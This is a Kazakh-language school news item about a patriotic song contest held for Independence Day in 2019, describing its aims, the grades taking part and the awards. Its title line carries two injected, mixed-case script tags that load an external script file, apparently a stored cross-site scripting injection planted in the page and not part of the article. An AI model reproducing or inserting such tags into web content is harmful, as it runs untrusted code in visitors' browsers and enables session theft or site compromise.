«Менің елім!» атты патриоттық әндер байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
09.12.2019
2019 жылы 15 желтоқсан күні Қазақстан Республикасының Тәуелсіздік күніне орай №1 Зеренді орта мектебінің акт залында «Менің елім!» атты патриоттық әндер байқауын өткізілді. Байқаудың мақсаты: Қазақстанның рухани бірлігін нығайту; жастардың патриоттық сезімдерін қалыптастыру; жас ұрпақты Отанына, туған еліне деген сүйіспеншілікті ояту, ана тілін құрметтеуге тәрбиелеу.
Байқау 5-9 сыныптар аралығында өткізілді. Қатысушылар қазақ, орыс тілдерінде патриоттық әндер орындады. Байқау соңында оқушылар І,ІІ,ІІІ орындармен және номинациялармен марапатталды.






Просмотров: 783